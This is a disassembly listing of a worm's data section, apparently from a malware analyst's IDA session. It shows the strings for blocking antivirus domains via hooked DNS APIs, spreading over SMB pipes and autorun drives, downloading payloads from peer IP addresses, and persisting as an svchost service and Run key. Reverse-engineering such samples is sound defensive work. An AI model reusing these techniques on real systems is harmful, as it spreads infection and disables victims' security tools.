dd 4327D0A8h, 4327D0AFh, 41F24300h, 41F243FFh, 0CC47BF00h
dd 0CC47BFFFh, 3FC29B90h, 3FC29B97h, 428855C0h, 428855C7h
dd 407CB848h, 407CB84Fh, 0D8C8CE00h, 0D8C8CEFFh, 3F505D00h
dd 3F505D7Fh, 43C0E1D0h, 43C0E1DFh, 454AA200h, 454AA2FFh
dd 41DD0500h, 41DD05FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 41F85500h, 41F855FFh, 0C7F39DC0h, 0C7F39DDFh, 0C7F39D70h
dd 0C7F39D77h, 41C2D2E0h, 41C2D2FFh, 0D0C28B00h, 0D0C28BFFh
dd 0D0CC3180h, 0D0CC31FFh, 0D0CD1A00h, 0D0CD1AFFh, 0D0D9B800h
dd 0D0D9BBFFh, 0D0DEAC00h, 0D0DEACFFh, 0D0E0C840h, 0D0E0C85Fh
dd 0D0E56400h, 0D0E565FFh, 0D0F11300h, 0D0F1130Fh, 0D0F11310h
dd 0D0F1131Fh, 0D0F109E0h, 0D0F109EFh, 0D0F46C00h, 0D0F46C0Fh
dd 0D0F51000h, 0D0F5101Fh, 0D0F911A0h, 0D0F911AFh, 3F68D800h
dd 3F68D87Fh, 3F45F500h, 3F45F5FFh, 445A8D48h, 445A8D4Fh
dd 3FC67BA0h, 3FC67BA7h, 44F83040h, 44F83047h, 44F83048h
dd 44F8304Fh, 633108F8h, 633108FFh, 4126AC48h, 4126AC4Fh
dd 4126AC60h, 4126AC6Fh, 4B95AE10h, 4B95AE17h, 4B9764F0h
dd 4B9764FFh, 40510860h, 4051087Fh, 4370FF90h, 4370FF97h
dd 3FF0C9B0h, 3FF0C9BFh, 0CE10D1D0h, 0CE10D1DFh, 3FF0C3D0h
dd 3FF0C3DFh, 0CE10CC40h, 0CE10CC4Fh, 0CE10DF00h, 0CE10DFFFh
dd 3FF0D800h, 3FF0DBFFh, 3FF0DC00h, 3FF0DFFFh, 0CE10F618h
dd 0CE10F61Fh, 3FF0C3C0h, 3FF0C3CFh, 0CE10E0A0h, 0CE10E0BFh
dd 43C02730h, 43C0273Fh, 4820F0A0h, 4820F0AFh, 4820C998h
dd 4820C99Fh, 43275198h, 4327519Fh, 45147F20h, 45147F27h
dd 0D8341C00h, 0D8341CFFh, 462AE600h, 462AE7FFh, 3FFB6100h
dd 3FFB61FFh, 43788480h, 43788487h, 43788498h, 4378849Fh
dd 437884C0h, 437884CFh, 437884D0h, 437884DFh, 447B4F40h
dd 447B4F4Fh, 447B4F30h, 447B4F37h, 447B4F50h, 447B4F5Fh
dd 43762BE0h, 43762BE7h, 45E5D0E0h, 45E5D0E7h, 427A55C8h
dd 427A55CFh, 3FC91248h, 3FC9124Fh, 4B27F490h, 4B27F497h
dd 4B2071B8h, 4B2071BFh, 41DFC400h, 41DFC4FFh, 0D1F90B00h
dd 0D1F90B0Fh, 43C0DEC0h, 43C0DECFh, 407C4410h, 407C441Fh
dd 43C0A850h, 43C0A85Fh, 57EE3080h, 57EE308Fh, 42232000h
dd 42233FFFh, 42232D00h, 42232DFFh, 0C72BB900h, 0C72BC2FFh
dd 0C7557D00h, 0C7557FFFh, 0C6062000h, 0C6063FFFh, 0CCB26EE0h
dd 0CCB26EFFh, 0D80AC000h, 0D80ACFFFh, 41796D00h, 41796DFFh
dd 417D1D00h, 417D1D7Fh, 9B400000h, 9B40FFFFh, 0CECC0AC0h
dd 0CECC0ADFh, 0D8FA1000h, 0D8FA1FFFh, 0D82389A0h, 0D82389BFh
dd 0D8238980h, 0D823898Fh, 0D82389C0h, 0D82389FFh, 0C9B3AB0h
dd 0C9B3ABFh, 0D15A70B0h, 0D15A70BFh, 427F41B8h, 427F41BFh
dd 41431FB0h, 41431FB7h, 43625C00h, 43625CFFh, 4362DF00h
dd 4362DFFFh, 4158B200h, 4158B2FFh, 43634B00h, 43634BFFh
dd 43636900h, 4363691Fh, 41D3F300h, 41D3F37Fh, 4362E200h
dd 4362E2FFh, 0D88E0C00h, 0D88E0C1Fh, 41587E00h, 41587E1Fh
dd 415B9F60h, 415B9F7Fh, 415A2960h, 415A297Fh, 0CC109B20h
dd 0CC109B3Fh, 0D1BEE510h, 0D1BEE51Fh, 0D1B7EB90h, 0D1B7EB9Fh
dd 0D1B7F320h, 0D1B7F32Fh, 0D1B7C20Ch, 0D1B7C20Fh, 4799EF00h
dd 4799EF07h, 4B0AF2A8h, 4B0AF2AFh, 4B362FB0h, 4B362FB7h
dd 40AB7D80h, 40AB7D87h, 0D0C27400h, 0D0C274FFh, 0D0C29800h
dd 0D0C298FFh, 0D0D5F200h, 0D0D5F2FFh, 4B0A4040h, 4B0A405Fh
dd 41DEC000h, 41DEC0FFh, 628177A0h, 628177A7h, 424D8200h
dd 424D8207h, 0D556AC80h, 0D556AC9Fh, 0D5F40A40h, 0D5F40A4Fh
dd 48ECA780h, 48ECA79Fh, 403AB000h, 403AB0FFh, 0CAB9A90h
dd 0CAB9A97h, 0D86F6C60h, 0D86F6C7Fh, 0CDA85560h, 0CDA8557Fh
dd 3F97E940h, 3F97E95Fh, 3F95E4A0h, 3F95E4BFh, 3F95EE40h
dd 3F95EE5Fh, 3F91F420h, 3F91F43Fh, 417AF100h, 417AF11Fh
dd 42B45000h, 42B45FFFh, 0D8638000h, 0D8638FFFh, 0D8680000h
dd 0D8681FFFh, 447EF7F8h, 447EF7FFh, 43420C80h, 43420C87h
dd 40511080h, 4051109Fh, 9BD4F140h, 9BD4F147h, 9BD4E5C0h
dd 9BD4E5DFh, 0D8291B08h, 0D8291B0Fh, 4AD38940h, 4AD3895Fh
dd 4AD388A0h, 4AD388A7h, 4569B538h, 4569B53Fh, 428C29C0h
dd 428C29C7h, 478A70C0h, 478A70DFh, 3FCBCA08h, 3FCBCA0Fh
dd 45E20470h, 45E2047Fh, 4B0BFB80h, 4B0BFB9Fh, 4CE34298h
dd 4CE3429Fh, 4CF9A800h, 4CF9A807h, 63929FC0h, 63929FC7h
dd 43729888h, 4372988Fh, 41D09D10h, 41D09D1Fh, 41D6AC00h
dd 41D6ACFFh, 437F4D00h, 437F4D0Fh, 74726563h, 2Eh, 736E6173h
dd 2Eh, 39746962h, 2Eh, 2E746576h, 0
dword_9A3C30 dd 2E677661h, 0 ; DATA XREF: .text:009BA4D4�o
dword_9A3C38 dd 2E707661h, 0 ; DATA XREF: .text:009BA4D0�o
dword_9A3C40 dd 2E6163h ; DATA XREF: .text:009BA4CC�o
dword_9A3C44 dd 2E69616Eh, 0 ; DATA XREF: .text:009BA4C8�o
aWindowsupdate db 'windowsupdate',0 ; DATA XREF: .text:009BA4C4�o
align 4
aWilderssecurit db 'wilderssecurity',0 ; DATA XREF: .text:009BA4C0�o
aThreatexpert db 'threatexpert',0 ; DATA XREF: .text:009BA4BC�o
align 4
aCastlecops db 'castlecops',0 ; DATA XREF: .text:009BA4B8�o
align 4
aSpamhaus db 'spamhaus',0 ; DATA XREF: .text:009BA4B4�o
align 4
aCpsecure db 'cpsecure',0 ; DATA XREF: .text:009BA4B0�o
align 10h
aArcabit db 'arcabit',0 ; DATA XREF: .text:009BA4AC�o
aEmsisoft db 'emsisoft',0 ; DATA XREF: .text:009BA4A8�o
align 4
aSunbelt db 'sunbelt',0 ; DATA XREF: .text:009BA4A4�o
aSecurecomputin db 'securecomputing',0 ; DATA XREF: .text:009BA4A0�o
aRising db 'rising',0 ; DATA XREF: .text:009BA49C�o
align 4
aPrevx db 'prevx',0 ; DATA XREF: .text:009BA498�o
align 4
aPctools db 'pctools',0 ; DATA XREF: .text:009BA494�o
aNorman db 'norman',0 ; DATA XREF: .text:009BA490�o
align 4
aK7computing db 'k7computing',0 ; DATA XREF: .text:009BA48C�o
aIkarus db 'ikarus',0 ; DATA XREF: .text:009BA488�o
align 10h
aHauri db 'hauri',0 ; DATA XREF: .text:009BA484�o
align 4
aHacksoft db 'hacksoft',0 ; DATA XREF: .text:009BA480�o
align 4
aGdata db 'gdata',0 ; DATA XREF: .text:009BA47C�o
align 4
aFortinet db 'fortinet',0 ; DATA XREF: .text:009BA478�o
align 4
aEwido db 'ewido',0 ; DATA XREF: .text:009BA474�o
align 10h
aClamav db 'clamav',0 ; DATA XREF: .text:009BA470�o
align 4
aComodo db 'comodo',0 ; DATA XREF: .text:009BA46C�o
align 10h
aQuickheal db 'quickheal',0 ; DATA XREF: .text:009BA468�o
align 4
aAvira db 'avira',0 ; DATA XREF: .text:009BA464�o
align 4
aAvast db 'avast',0 ; DATA XREF: .text:009BA460�o
align 4
aEsafe db 'esafe',0 ; DATA XREF: .text:009BA45C�o
align 4
aAhnlab db 'ahnlab',0 ; DATA XREF: .text:009BA458�o
align 4
aCentralcommand db 'centralcommand',0 ; DATA XREF: .text:009BA454�o
align 4
aDrweb db 'drweb',0 ; DATA XREF: .text:009BA450�o
align 4
aGrisoft db 'grisoft',0 ; DATA XREF: .text:009BA44C�o
aEset db 'eset',0 ; DATA XREF: .text:009BA448�o
align 4
aNod32 db 'nod32',0 ; DATA XREF: .text:009BA444�o
align 4
aFProt db 'f-prot',0 ; DATA XREF: .text:009BA440�o
align 4
aJotti db 'jotti',0 ; DATA XREF: .text:009BA43C�o
align 4
aKaspersky db 'kaspersky',0 ; DATA XREF: .text:009BA438�o
align 4
aFSecure db 'f-secure',0 ; DATA XREF: .text:009BA434�o
align 4
aComputerassoci db 'computerassociates',0 ; DATA XREF: .text:009BA430�o
align 4
aNetworkassocia db 'networkassociates',0 ; DATA XREF: .text:009BA42C�o
align 4
aEtrust db 'etrust',0 ; DATA XREF: .text:009BA428�o
align 4
aPanda db 'panda',0 ; DATA XREF: .text:009BA424�o
align 4
aSophos db 'sophos',0 ; DATA XREF: .text:009BA420�o
align 4
aTrendmicro db 'trendmicro',0 ; DATA XREF: .text:009BA41C�o
align 10h
aMcafee db 'mcafee',0 ; DATA XREF: .text:009BA418�o
align 4
aNorton db 'norton',0 ; DATA XREF: .text:009BA414�o
align 10h
aSymantec db 'symantec',0 ; DATA XREF: .text:009BA410�o
align 4
aMicrosoft db 'microsoft',0 ; DATA XREF: .text:009BA40C�o
align 4
aDefender db 'defender',0 ; DATA XREF: .text:009BA408�o
align 4
aRootkit db 'rootkit',0 ; DATA XREF: .text:009BA404�o
aMalware db 'malware',0 ; DATA XREF: .text:009BA400�o
aSpyware db 'spyware',0 ; DATA XREF: .text:009BA3FC�o
aVirus db 'virus',0 ; DATA XREF: .text:off_9BA3F8�o
align 4
; IID stru_9A3E64
stru_9A3E64 dd 304CE942h ; Data1 ; DATA XREF: sub_9A9DE7+1E�o
dw 6E39h ; Data2
dw 40D8h ; Data3
db 94h, 3Ah, 0B9h, 13h, 0C4h, 0Ch, 9Ch, 0D4h; Data4
; IID stru_9A3E74
stru_9A3E74 dd 0F7898AF5h ; Data1 ; DATA XREF: sub_9A9DE7+15�o
dw 0CAC4h ; Data2
dw 4632h ; Data3
db 0A2h, 0ECh, 0DAh, 6, 0E5h, 11h, 1Ah, 0F2h; Data4
; IID stru_9A3E84
stru_9A3E84 dd 0CA545C6h ; Data1 ; DATA XREF: sub_9A9ED0+72�o
dw 37ADh ; Data2
dw 4A6Ch ; Data3
db 0BFh, 92h, 9Fh, 76h, 10h, 6, 7Eh, 0F5h; Data4
; IID stru_9A3E94
stru_9A3E94 dd 0E0483BA0h ; Data1 ; DATA XREF: sub_9A9ED0+6A�o
dw 47FFh ; Data2
dw 4D9Ch ; Data3
db 0A6h, 0D6h, 77h, 41h, 0D0h, 0B1h, 95h, 0F7h; Data4
; char a08x08x[]
a08x08x db '%08x%08x',0 ; DATA XREF: sub_9AA064+74�o
align 10h
stru_9A3EB0 _msEH <0FFFFFFFFh, offset loc_9AA177, offset loc_9AA17B>
; DATA XREF: sub_9AA0F1+2�o
; char aTcp[]
aTcp db 'TCP',0 ; DATA XREF: sub_9AA18B+A6�o
; sub_9AA320+90�o
; char aD[]
aD db '%d',0 ; DATA XREF: sub_9AA18B+1C�o
; sub_post_recv_and_parse+11F�o ...
align 8
stru_9A3EC8 _msEH <0FFFFFFFFh, offset loc_9AA26A, offset loc_9AA26E>
; DATA XREF: sub_9AA18B+5�o
align 8
stru_9A3ED8 _msEH <0FFFFFFFFh, offset loc_9AA30C, offset loc_9AA310>
; DATA XREF: sub_post_and_recv_find_external_adr+5�o
; char aU[]
aU db '%u',0 ; DATA XREF: sub_9AA320+2A�o
; sub_9AA320+A3�o ...
align 4
stru_9A3EE8 _msEH <0FFFFFFFFh, offset loc_9AA44F, offset loc_9AA453>
; DATA XREF: sub_9AA320+5�o
aHttpWww_getmyi db 'http://www.getmyip.org',0 ; DATA XREF: .text:009BA4F4�o
align 4
aHttpWww_whatsm db 'http://www.whatsmyipaddress.com',0 ; DATA XREF: .text:009BA4F0�o
aHttpWww_whatis db 'http://www.whatismyip.org',0 ; DATA XREF: .text:009BA4EC�o
align 4
aHttpCheckip_dy db 'http://checkip.dyndns.org',0 ; DATA XREF: .text:009BA4E8�o
align 4
; char SubStr[]
SubStr db 'ip address',0 ; DATA XREF: sub_9AA463+7E�o
align 10h
stru_9A3F70 _msEH <0FFFFFFFFh, offset loc_9AA55E, offset loc_9AA562>
; DATA XREF: sub_9AA463+2�o
align 10h
stru_9A3F80 _msEH <0FFFFFFFFh, offset loc_9AA60E, offset loc_9AA612>
; DATA XREF: sub_download_and_check_my_IP+2�o
; char aHttpD_D_D_DDS[]
aHttpD_D_D_DDS db 'http://%d.%d.%d.%d:%d/%s',0 ; DATA XREF: sub_9AA646+2A�o
; sub_call_download_file_from_given_url_ret_true_if_same_as_own+3B�o
align 4
; char aSIpc_0[]
aSIpc_0 db '\\%s\IPC$',0 ; DATA XREF: sub_9AA736+12�o
; sub_9AABAE+12E�o
align 4
aAaa: ; DATA XREF: sub_9AA799+55�o
unicode 0, <AAA>,0
aS_0 db 'S',0 ; DATA XREF: sub_9AA799+50�o
aVivivivi db 'VVVV',0
align 4
aM db 'M',0 ; DATA XREF: sub_9AA799+4B�o
aVivi db 'VV',0
align 10h
; unsigned __int8 ProtSeq
ProtSeq db 'ncacn_np',0 ; DATA XREF: sub_9AA799+1F�o
; sub_9AA82D+22�o
align 10h
stru_9A3FE0 _msEH <0FFFFFFFFh, offset loc_9AA804, offset loc_9AA812>
; DATA XREF: sub_9AA799+2�o
; unsigned __int8 Endpoint
Endpoint dd 7069705Ch, 72735C65h, 63767376h, 0 ; DATA XREF: sub_9AABAE+98�o
aHhdhh: ; DATA XREF: sub_9AA82D+7D�o
unicode 0, <HHDHH>,0
asc_9A4008: ; DATA XREF: sub_9AA82D+69�o
; sub_9AA8E9+B7�o
unicode 0, <\>,0
align 10h
stru_9A4010 _msEH <0FFFFFFFFh, offset loc_9AA8C0, offset loc_9AA8CE>
; DATA XREF: sub_9AA82D+5�o
; unsigned __int8 dword_9A401C
dword_9A401C dd 7069705Ch, 72625C65h, 6573776Fh, 72h ; DATA XREF: sub_9AA8E9+25C�o
dword_9A402C dd 0B6244A92h, 37F50397h, 0 ; DATA XREF: sub_9AA8E9+234�o
a____: ; DATA XREF: sub_9AA8E9+10D�o
unicode 0, <\..\..\>,0
; char aD_D_D_D[]
aD_D_D_D db '\\%d.%d.%d.%d',0 ; DATA XREF: sub_9AA8E9+21�o
align 4
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_9AABAE+2D�o
; wchar_t a__
a__: ; DATA XREF: sub_9AAD09+1D�o
unicode 0, <\..\>,0
align 10h
stru_9A4070 _msEH <0FFFFFFFFh, offset loc_9AAD50, offset loc_9AAD54>
; DATA XREF: sub_9AAD09+2�o
align 10h
stru_9A4080 _msEH <0FFFFFFFFh, offset loc_9AADBC, offset loc_9AADC0>
; DATA XREF: sub_9AADA0+2�o
align 10h
stru_9A4090 _msEH <0FFFFFFFFh, offset loc_9AAE44, offset loc_9AAE48>
; DATA XREF: sub_9AAE1D+2�o
align 10h
stru_9A40A0 _msEH <0FFFFFFFFh, offset loc_9AAEFF, offset loc_9AAF03>
; DATA XREF: sub_9AAE90+5�o
align 10h
stru_9A40B0 _msEH <0FFFFFFFFh, offset loc_9AAF95, offset loc_9AAF99>
; DATA XREF: sub_9AAF4B+5�o
align 10h
stru_9A40C0 _msEH <0FFFFFFFFh, offset loc_9AB034, offset loc_9AB038>
; DATA XREF: sub_9AAFE1+5�o
align 10h
stru_9A40D0 _msEH <0FFFFFFFFh, offset loc_9AB11C, offset loc_9AB120>
; DATA XREF: sub_9AB07D+5�o
align 10h
stru_9A40E0 _msEH <0FFFFFFFFh, 0, offset nullsub_1> ; DATA XREF: sub_9AB130+2�o
align 10h
_msEH <0FFFFFFFFh, offset loc_9AB285, offset loc_9AB289>
; DATA XREF: sub_9AB1C8+5�o
align 10h
stru_9A4100 _msEH <0FFFFFFFFh, offset loc_9AB3E8, offset loc_9AB3EC>
; DATA XREF: sub_9AB2C9+2�o
; char dword_9A410C[]
dword_9A410C dd 6174656Eh, 32336970h, 6C6C642Eh, 0 ; DATA XREF: sub_patch_NetpwPathCanonicalize+F�o
; char aNetpwpathcanon[]
aNetpwpathcanon db 'NetpwPathCanonicalize',0 ; DATA XREF: sub_patch_NetpwPathCanonicalize+A�o
align 4
; char aNtdll_dll[]
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_9AB49A+F�o
; sub_CreateRemoteThreasandwriteProcessMemory+B8�o ...
align 10h
; char aNtqueryinforma[]
aNtqueryinforma db 'NtQueryInformationProcess',0 ; DATA XREF: sub_9AB49A+A�o
; sub_9ACEC5+8�o ...
align 4
; char aQuery_main[]
aQuery_main db 'Query_Main',0 ; DATA XREF: sub_patch_DNS_APIs+56�o
align 4
; char aDnsquery_w[]
aDnsquery_w db 'DnsQuery_W',0 ; DATA XREF: sub_patch_DNS_APIs+3F�o
align 4
; char aDnsquery_utf8[]
aDnsquery_utf8 db 'DnsQuery_UTF8',0 ; DATA XREF: sub_patch_DNS_APIs+28�o
align 4
; char aDnsapi_dll[]
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_patch_DNS_APIs+13�o
align 10h
; char aDnsquery_a[]
aDnsquery_a db 'DnsQuery_A',0 ; DATA XREF: sub_patch_DNS_APIs+E�o
align 4
; char aWs2_32_dll[]
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_patch_DNS_rslvr_APIs+24�o
align 4
; char aSendto[]
aSendto db 'sendto',0 ; DATA XREF: sub_patch_DNS_rslvr_APIs+1F�o
align 10h
; char ModuleName[]
ModuleName db 'dnsrslvr.dll',0 ; DATA XREF: sub_patch_DNS_rslvr_APIs�o
align 10h
; const WCHAR aSvchost_exeKNe
aSvchost_exeKNe: ; DATA XREF: sub_find_svchost_and_attach:loc_9AB56A�o
unicode 0, <svchost.exe -k NetworkService>,0
asc_9A41FC: ; DATA XREF: sub_9AB5CF:loc_9AB5E2�o
; sub_9AB6D6:loc_9AB711�o
unicode 0, < >,0
; char asc_9A4200[]
asc_9A4200 db 0Dh,0Ah,0 ; DATA XREF: sub_9AB63B:loc_9AB660�o
; sub_process_http_request_and_serve_dll_file+1FC�o
align 4
asc_9A4204: ; DATA XREF: sub_9AB63B:loc_9AB659�o
dw 0Dh
unicode 0, <>,0
asc_9A4208: ; DATA XREF: sub_9AB63B+17�o
dw 0Ah
unicode 0, <>,0
asc_9A420C: ; DATA XREF: sub_9AB6D6:loc_9AB723�o
unicode 0, <;>,0
asc_9A4210: ; DATA XREF: sub_9AB7A5+7C�o
; sub_9AB855+154�o
unicode 0, <=>,0
asc_9A4214: ; DATA XREF: sub_9AB7A5+3A�o
; sub_9AB855+93�o
unicode 0, <]>,0
asc_9A4218: ; DATA XREF: sub_9AB7A5+A�o
; sub_9AB855+6C�o
unicode 0, <[>,0
a4_0 db ',4',0 ; DATA XREF: sub_9AB855+1B4�o
align 10h
aSystem32Shell3 db '\system32\shell32.dll',0 ; DATA XREF: sub_9AB855+1A4�o
align 4
aWindir db '%windir%',0 ; DATA XREF: sub_9AB855+198�o
align 4
aSystemroot db '%systemroot%',0 ; DATA XREF: sub_9AB855+191�o
align 4
aAutorun db 'autorun',0 ; DATA XREF: sub_9AB855+80�o
aUseautoplay1 db 'useautoplay=1',0 ; DATA XREF: sub_9AB855+3A�o
align 4
; char aIcon[]
aIcon db 'icon',0 ; DATA XREF: sub_9AB855+1E�o
; sub_9AB855:loc_9AB9CE�o
align 4
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_9AB855+16�o
; sub_9AB855:loc_9ABA10�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_9AB855+11�o
align 4
aShellexecute db 'shellexecute',0 ; DATA XREF: sub_9AB855+7�o
align 4
aRundll32 db 'rundll32',0 ; DATA XREF: sub_9ABA9B+41�o
align 10h
stru_9A42A0 _msEH <0FFFFFFFFh, offset loc_9ABB72, offset loc_9ABB76>
; DATA XREF: sub_9ABA9B+2�o
; char a_SSS_SS[]
a_SSS_SS db '.\%s\%s\%s.%s,%s',0 ; DATA XREF: sub_9ABB9F+3D8�o
align 10h
; char aSautorun_inf[]
aSautorun_inf db '%sautorun.inf',0 ; DATA XREF: sub_9ABB9F+345�o
align 10h
; char aSS_1[]
aSS_1 db '%s\%s',0 ; DATA XREF: sub_9ABB9F+27C�o
align 4
; char aSS_0[]
aSS_0 db '%s%s',0 ; DATA XREF: sub_9ABB9F+21D�o
align 10h
; char aSSSS_S[]
aSSSS_S db '%s%s\%s\%s.%s',0 ; DATA XREF: sub_9ABB9F+1B9�o
align 10h
; char aSDDDDDDDDDDDDD[]
aSDDDDDDDDDDDDD db 'S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d',0 ; DATA XREF: sub_9ABB9F+13E�o
align 4
; char aRecycler[]
aRecycler db 'RECYCLER',0 ; DATA XREF: sub_9ABB9F+B1�o
align 10h
; char aDll_0[]
aDll_0 db 'dll',0 ; DATA XREF: sub_9ABB9F+86�o
align 8
stru_9A4328 _msEH <0FFFFFFFFh, offset loc_9ABFAA, offset loc_9ABFAE>
; DATA XREF: sub_9ABB9F+5�o
; char aExplorerS[]
aExplorerS db 'explorer %s',0 ; DATA XREF: sub_attach_to_explorer+A2�o
a__0: ; DATA XREF: sub_attach_to_explorer+8E�o
unicode 0, <.>,0
align 8
; char aSoftwareMicr_0[]
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folde'
; DATA XREF: sub_attach_to_explorer+14�o
db 'r\Hidden\SHOWALL',0
align 4
; char aCheckedvalue[]
aCheckedvalue db 'CheckedValue',0 ; DATA XREF: sub_attach_to_explorer+F�o
align 4
aOpenFolderToVi db 'Open folder to view files',0 ; DATA XREF: sub_infect_remote_and_removable_drives:loc_9AC2FC�o
align 4
; char aShell32_dll[]
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_infect_remote_and_removable_drives+7�o
; char aKernel32_dll[]
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_set_file_time_to_kernel32_time+18�o
; sub_CreateRemoteThreasandwriteProcessMemory+5A�o ...
align 4
; char aThread08xStatu[]
aThread08xStatu db 'thread: %08x, status: %08x',0Ah,0 ; DATA XREF: sub_CreateRemoteThreasandwriteProcessMemory+148�o
; char aLoadlibraryexa[]
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_CreateRemoteThreasandwriteProcessMemory+CD�o
align 10h
; char aNtqueueapcthre[]
aNtqueueapcthre db 'NtQueueApcThread',0 ; DATA XREF: sub_CreateRemoteThreasandwriteProcessMemory:loc_9ACD52�o
align 4
; char ProcName[]
ProcName db 'LoadLibraryA',0 ; DATA XREF: sub_CreateRemoteThreasandwriteProcessMemory+55�o
align 4
; char aNtsetinformati[]
aNtsetinformati db 'NtSetInformationProcess',0 ; DATA XREF: sub_9ACFF6+24�o
align 10h
stru_9A4450 _msEH <0FFFFFFFFh, offset loc_9AD247, offset loc_9AD24B>
; DATA XREF: sub_9AD15E+2�o
dd 7073796Dh, 2E656361h, 6D6F63h ; DATA XREF: .text:009BAAC4�o
dd 2E6E736Dh, 6D6F63h ; DATA XREF: .text:009BAAC0�o
; .text:009BAD34�o
dd 79616265h, 6D6F632Eh, 0 ; DATA XREF: .text:009BAABC�o
dword_9A447C dd 2E6E6E63h, 6D6F63h ; DATA XREF: .text:009BAAB8�o
dword_9A4484 dd 2E6C6F61h, 6D6F63h ; DATA XREF: .text:off_9BAAB4�o
; char aHttpWww_S[]
aHttpWww_S db 'http://www.%s',0 ; DATA XREF: sub_call_download_file_from_url+20�o
; sub_9AEC85+2C�o
align 10h
stru_9A44A0 _msEH <0FFFFFFFFh, offset loc_9AD811, offset loc_9AD815>
; DATA XREF: sub_9AD6D4+2�o
align 10h
stru_9A44B0 _msEH <0FFFFFFFFh, offset loc_9ADA12, offset loc_9ADA16>
; DATA XREF: sub_9AD8BC+2�o
; char aN08x08x08x[]
aN08x08x08x db 'n%08x%08x%08x',0 ; DATA XREF: sub_9ADA44+A2�o
align 4
; char aW08x08x08x[]
aW08x08x08x db 'w%08x%08x%08x',0 ; DATA XREF: sub_outbound_propagation+310�o
; sub_outbound_propagation+4B3�o
align 4
; char aL08x08x08x[]
aL08x08x08x db 'l%08x%08x%08x',0 ; DATA XREF: sub_outbound_propagation+9C�o
; sub_outbound_propagation+433�o
align 4
aWindows_0: ; DATA XREF: .text:009BAB18�o
unicode 0, <Windows>,0
aUpdate: ; DATA XREF: .text:009BAB14�o
unicode 0, <Update>,0
align 4
aUniversal: ; DATA XREF: .text:009BAB10�o
unicode 0, <Universal>,0
aTime: ; DATA XREF: .text:009BAB0C�o
unicode 0, <Time>,0
align 4
aTask: ; DATA XREF: .text:009BAB08�o
unicode 0, <Task>,0
align 4
aSystem_0: ; DATA XREF: .text:009BAB04�o
unicode 0, <System>,0
align 4
aSupport: ; DATA XREF: .text:009BAB00�o
unicode 0, <Support>,0
aShell: ; DATA XREF: .text:009BAAFC�o
unicode 0, <Shell>,0
aServer_0: ; DATA XREF: .text:009BAAF8�o
unicode 0, <Server>,0
align 4
aSecurity_0: ; DATA XREF: .text:009BAAF4�o
unicode 0, <Security>,0
align 4
aNetwork: ; DATA XREF: .text:009BAAF0�o
unicode 0, <Network>,0
aMonitor_0: ; DATA XREF: .text:009BAAEC�o
unicode 0, <Monitor>,0
aMicrosoft_0: ; DATA XREF: .text:009BAAE8�o
unicode 0, <Microsoft>,0
aManager_0: ; DATA XREF: .text:009BAAE4�o
unicode 0, <Manager>,0
aInstaller: ; DATA XREF: .text:009BAAE0�o
unicode 0, <Installer>,0
aImage: ; DATA XREF: .text:009BAADC�o
unicode 0, <Image>,0
aHelper: ; DATA XREF: .text:009BAAD8�o
unicode 0, <Helper>,0
align 4
aDriver: ; DATA XREF: .text:009BAAD4�o
unicode 0, <Driver>,0
align 4
aConfig: ; DATA XREF: .text:009BAAD0�o
unicode 0, <Config>,0
align 4
aCenter: ; DATA XREF: .text:009BAACC�o
unicode 0, <Center>,0
align 4
aBoot: ; DATA XREF: .text:009BAAC8�o
unicode 0, <Boot>,0
align 4
; char aResetsr[]
aResetsr db 'ResetSR',0 ; DATA XREF: sub_9AE140+22�o
; char LibFileName[]
LibFileName db 'srclient.dll',0 ; DATA XREF: sub_9AE140+C�o
align 10h
stru_9A4650 _msEH <0FFFFFFFFh, offset loc_9AE17B, offset loc_9AE17F>
; DATA XREF: sub_9AE140+2�o
align 10h
dword_9A4660 dd 0FFFFFFFFh, 9AE375h, 9AE379h, 0 ; DATA XREF: sub_9AE195+5�o
stru_9A4670 _msEH <0FFFFFFFFh, offset loc_9AE464, offset loc_9AE468>
; DATA XREF: sub_9AE3A4+2�o
align 10h
aSoftwareMicr_1: ; DATA XREF: sub_9AE520+F�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 4
; const WCHAR aServicedll
aServicedll: ; DATA XREF: sub_9AE641+1B9�o
unicode 0, <ServiceDll>,0
align 4
; const WCHAR SubKey
SubKey: ; DATA XREF: sub_9AE641+196�o
unicode 0, <Parameters>,0
align 4
; const WCHAR aDescription
aDescription: ; DATA XREF: sub_9AE641+17E�o
unicode 0, <Description>,0
; const WCHAR aObjectname
aObjectname: ; DATA XREF: sub_9AE641+163�o
unicode 0, <ObjectName>,0
align 4
; BYTE Data
Data: ; DATA XREF: sub_9AE641+15B�o
unicode 0, <LocalSystem>,0
; const WCHAR aImagepath
aImagepath: ; DATA XREF: sub_9AE641+14F�o
unicode 0, <ImagePath>,0
; const WCHAR aErrorcontrol
aErrorcontrol: ; DATA XREF: sub_9AE641+131�o
unicode 0, <ErrorControl>,0
align 4
; const WCHAR aStart
aStart: ; DATA XREF: sub_9AE641+117�o
unicode 0, <Start>,0
; const WCHAR aType
aType: ; DATA XREF: sub_9AE641+FD�o
unicode 0, <Type>,0
align 4
; const WCHAR ValueName
ValueName: ; DATA XREF: sub_9AE641+EA�o
unicode 0, <DisplayName>,0
align 8
aSystemCurrentc: ; DATA XREF: sub_9AE641+60�o
unicode 0, <SYSTEM\CurrentControlSet\Services\>,0
align 10h
aSystemrootSyst: ; DATA XREF: sub_9AE641+1C�o
unicode 0, <%SystemRoot%\system32\svchost.exe -k >,0
; char aSoftwareMicr_2[]
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_setup_run_dll32_and_netsvc+19C�o
align 4
; char aRundll32_exe_0[]
aRundll32_exe_0 db 'rundll32.exe "%s",%s',0 ; DATA XREF: sub_setup_run_dll32_and_netsvc+163�o
align 4
; wchar_t aNetsvcs
